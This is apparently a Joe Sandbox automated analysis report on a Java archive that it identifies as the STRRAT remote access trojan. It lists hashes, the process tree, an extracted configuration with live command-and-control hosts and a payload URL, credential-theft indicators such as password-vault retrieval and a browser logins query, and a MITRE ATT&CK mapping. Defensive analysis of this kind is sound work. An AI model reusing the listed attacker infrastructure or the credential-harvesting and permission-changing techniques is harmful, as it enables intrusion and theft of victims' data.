Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MVO4879773357878.jar

Overview

General Information

Sample name:MVO4879773357878.jar
Analysis ID:1417504
MD5:ee75fce2158c3587daa560419f122001
SHA1:760d09adceeb4903db4130ef0d28654915844d5d
SHA256:88a9b4cfac5ba3a433942f8f4e489229f0fd694a7f9a78a8b6ca5cc5dc590e00
Tags:jarSTRRAT
Infos:

Detection

STRRAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
Exploit detected, runtime environment starts unknown processes
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7za.exe (PID: 6796 cmdline: 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • java.exe (PID: 1800 cmdline: java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
    • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 3260 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: STRRAT

{"C2 list": "d4money.dynamic-dns.net:7888", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "d4money.dynamic-dns.net:7881", "lid": "khonsari", "Startup": "true", "Secondary Startup": "true", "Scheduled Task": "true"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
akllnBiTjwPmAwfMbajsTFm.classINDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePasswordDetects PowerShell content designed to retrieve passwords from hostditekSHen
  • 0x155:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x3fb:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x18b:$method1: RetrieveAll()
  • 0x1a1:$method2: .RetrievePassword()

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.classINDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePasswordDetects PowerShell content designed to retrieve passwords from hostditekSHen
  • 0x155:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x3fb:$namespace: Windows.Security.Credentials.PasswordVault
  • 0x18b:$method1: RetrieveAll()
  • 0x1a1:$method2: .RetrievePassword()

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
    00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
      Process Memory Space: java.exe PID: 1800JoeSecurity_STRRATYara detected STRRATJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5URL Reputation: Label: malware
        Source: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5URL Reputation: Label: malware
        Source: http://wshsoft.company/multrdp.jpgAvira URL Cloud: Label: malware
        Found malware configuration
        Source: MVO4879773357878.jarMalware Configuration Extractor: STRRAT {"C2 list": "d4money.dynamic-dns.net:7888", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "d4money.dynamic-dns.net:7881", "lid": "khonsari", "Startup": "true", "Secondary Startup": "true", "Scheduled Task": "true"}
        Multi AV Scanner detection for domain / URL
        Source: http://wshsoft.company/multrdp.jpgVirustotal: Detection: 15%Perma Link
        Multi AV Scanner detection for submitted file
        Source: MVO4879773357878.jarVirustotal: Detection: 45%Perma Link
        Source: MVO4879773357878.jarReversingLabs: Detection: 39%

        Software Vulnerabilities

        barindex
        Exploit detected, runtime environment starts unknown processes
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\System32\conhost.exe
        Source: java.exe, 00000002.00000002.2872991367.0000000009D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875197383.0000000016BB5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1677179087.0000000016BAE000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
        Source: java.exe, 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875197383.0000000016BB5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1677179087.0000000016BAE000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875197383.0000000016BB5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1677179087.0000000016BAE000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
        Source: java.exe, 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
        Source: java.exe, 00000002.00000003.1677262279.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009F17000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872568836.0000000004BDE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875177365.0000000016B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
        Source: java.exe, 00000002.00000002.2872991367.0000000009DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875197383.0000000016BB5000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1677179087.0000000016BAE000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
        Source: CHHXGzeSpzwiJOAtZoSZBJ.classString found in binary or memory: http://wshsoft.company/multrdp.jpg
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.classString found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.classString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
        Source: java.exe, 00000002.00000002.2875286809.0000000016CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarXs
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.classString found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
        Source: DZQmNBgOWWDUGcQCKUlPSbuRpohqT.classString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
        Source: java.exe, 00000002.00000002.2875286809.0000000016D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarl

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: akllnBiTjwPmAwfMbajsTFm.class, type: SAMPLEMatched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
        Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, type: DROPPEDMatched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
        Source: C:\Windows\System32\7za.exeSection loaded: 7z.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: opengl32.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: glu32.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: akllnBiTjwPmAwfMbajsTFm.class, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
        Source: C:\jar\carLambo\akllnBiTjwPmAwfMbajsTFm.class, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
        Source: classification engineClassification label: mal92.troj.expl.winJAR@7/81@0/0
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
        Source: C:\Windows\System32\7za.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ETIKYbEhuMLgDjIJSHDmGnlmeMsm.class.0.drBinary or memory string: SELECT * FROM logins;
        Source: MVO4879773357878.jarVirustotal: Detection: 45%
        Source: MVO4879773357878.jarReversingLabs: Detection: 39%
        Source: unknownProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\MVO4879773357878.jar"
        Source: C:\Windows\System32\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe java.exe -jar "C:\Users\user\Desktop\MVO4879773357878.jar" carLambo.FirstRun
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262A20A push ecx; ret 2_2_0262A21A
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262A21B push ecx; ret 2_2_0262A225
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262BB67 push 00000000h; mov dword ptr [esp], esp2_2_0262BB8D
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262B3B7 push 00000000h; mov dword ptr [esp], esp2_2_0262B3DD
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262B947 push 00000000h; mov dword ptr [esp], esp2_2_0262B96D
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_0262C477 push 00000000h; mov dword ptr [esp], esp2_2_0262C49D
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: java.exe, 00000002.00000002.2873568368.0000000014800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
        Source: java.exe, 00000002.00000003.1624831012.000000001675B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
        Source: java.exe, 00000002.00000002.2872166413.0000000000C7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2[Ljava/lang/VirtualMachineError;
        Source: java.exe, 00000002.00000002.2872166413.0000000000C7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeMemory protected: page read and write | page guardJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 2_2_026203C0 cpuid 2_2_026203C0
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\1800 VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected STRRAT
        Source: Yara matchFile source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: java.exe PID: 1800, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected STRRAT
        Source: Yara matchFile source: 00000002.00000002.2872991367.0000000009D69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: java.exe PID: 1800, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Exploitation for Client Execution        		1
        Services File Permissions Weakness        		1
        Services File Permissions Weakness        		1
        Services File Permissions Weakness        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		11
        Process Injection        		1
        Disable or Modify Tools        		LSASS Memory21
        System Information Discovery        		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		11
        Process Injection        		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417504 Sample: MVO4879773357878.jar Startdate: 29/03/2024 Architecture: WINDOWS Score: 92 19 Multi AV Scanner detection for domain / URL 2->19 21 Found malware configuration 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 4 other signatures 2->25 7 java.exe 9 2->7         started        9 7za.exe 84 2->9         started        process3 process4 11 icacls.exe 1 7->11         started        13 conhost.exe 7->13         started        15 conhost.exe 9->15         started        process5 17 conhost.exe 11->17         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        MVO4879773357878.jar45%VirustotalBrowse
        MVO4879773357878.jar39%ReversingLabsByteCode-JAVA.Trojan.Strrat

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5100%URL Reputationmalware
        http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5100%URL Reputationmalware
        http://bugreport.sun.com/bugreport/0%URL Reputationsafe
        http://wshsoft.company/multrdp.jpg100%Avira URL Cloudmalware
        http://wshsoft.company/multrdp.jpg16%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://java.oracle.com/java.exe, 00000002.00000002.2872991367.0000000009D99000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://null.oracle.com/java.exe, 00000002.00000003.1677262279.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676798758.0000000016B7E000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872991367.0000000009F17000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000002.2872568836.0000000004BDE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000002.00000003.1676858044.0000000016B85000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000002.00000002.2875177365.0000000016B8D000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarDZQmNBgOWWDUGcQCKUlPSbuRpohqT.classfalse
              		high
              https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarljava.exe, 00000002.00000002.2875286809.0000000016D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarDZQmNBgOWWDUGcQCKUlPSbuRpohqT.classfalse
                  		high
                  http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5java.exe, 00000002.00000002.2872568836.0000000004B90000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  		unknown
                  https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jarXsjava.exe, 00000002.00000002.2875286809.0000000016CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://wshsoft.company/multrdp.jpgCHHXGzeSpzwiJOAtZoSZBJ.classfalse
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jarDZQmNBgOWWDUGcQCKUlPSbuRpohqT.classfalse
                      		high
                      http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.2872991367.0000000009D94000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jarDZQmNBgOWWDUGcQCKUlPSbuRpohqT.classfalse
                        		high

                        World Map of Contacted IPs

